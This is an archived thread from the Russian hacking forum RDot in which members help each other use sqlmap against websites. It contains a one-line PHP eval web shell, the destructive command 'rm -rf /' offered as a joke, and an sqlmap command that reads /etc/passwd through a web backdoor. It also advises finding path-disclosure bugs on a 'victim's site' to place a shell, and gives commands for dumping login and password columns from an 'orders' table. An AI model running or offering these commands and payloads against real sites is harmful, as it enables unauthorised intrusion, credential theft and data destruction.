RDot

RDot (https://rdot.org/forum/index.php)
-   Оффтоп/Offtopic (https://rdot.org/forum/forumdisplay.php?f=12)
-   -   sqlmap пару вопросов (https://rdot.org/forum/showthread.php?t=1969)

Lostnull 28.02.2012 14:59

Цитата:

Сообщение от Shadowfolder (Сообщение 24046)
и как можно будет туда записать шелл? что такое "rm -rf /?

Это и есть мини шелл, для парней со стальными яйцами.

Shadowfolder 29.02.2012 06:52

и как потом к нему обратится, чтобы юзать?команда rm ведь для удаления же

faza02 29.02.2012 07:01

залей в него <?php eval($_GET[a]); ?>
в чем проблема-то?

fawkes 29.02.2012 21:26

нуждаться в помощи
 
я поступил заказ:
python sqlmap.py -u "http://xxxxxxx.com/index.php?id=xxx" --os-cmd "cat /etc/passwd" -v 3
и полученные результаты в виде:

[19:06:13] [INFO] the back-end DBMS is MySQL

web application technology: Apache
back-end DBMS: MySQL 5.0
[19:06:13] [INFO] going to use a web backdoor for command execution
[19:06:13] [INFO] fingerprinting the back-end DBMS operating system
[19:06:13] [DEBUG] performed 0 queries in 0 seconds
[19:06:13] [INFO] the back-end DBMS operating system is Linux
[19:06:13] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3

[19:06:18] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]:

Я не знаю, что я должен делать больше.
Извините, я не знаю русский хорошо.
Мне нужна ваша помощь, чтобы знать, что я должен сделать в результате

a10nE 02.03.2012 15:13

If I got you right, you have to input full path to a directory you want to upload shell to. This directory should exists.
Try to find path-disclosure vulnerability on victim's site, or try some default ones.

FlatL1ne 26.03.2012 21:27

Как дампить определенные колонки?

python ./sqlmap.py -u "site.com/xxx.php?" --dump -T orders --start 3 --stop 4 -D basa -v 1 -threads 10
или так
python ./sqlmap.py -u "site.com/xxx.php?" --dump -T orders -D basa -v 1 -threads 10 --start 3 --stop 4

выдает какойто бред и перестает работать.

Ispanec 26.03.2012 23:20

Цитата:

Сообщение от FlatL1ne (Сообщение 24825)
Как дампить определенные колонки?

python ./sqlmap.py -u "site.com/xxx.php?" --dump -T orders --start 3 --stop 4 -D basa -v 1 -threads 10
или так
python ./sqlmap.py -u "site.com/xxx.php?" --dump -T orders -D basa -v 1 -threads 10 --start 3 --stop 4

выдает какойто бред и перестает работать.


Достаточно этого:
Код:

python ./sqlmap.py -u "site.com/xxx.php?" -D basa -T orders -C id,login,pass
А вообще вот


Часовой пояс GMT +3, время: 07:50.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot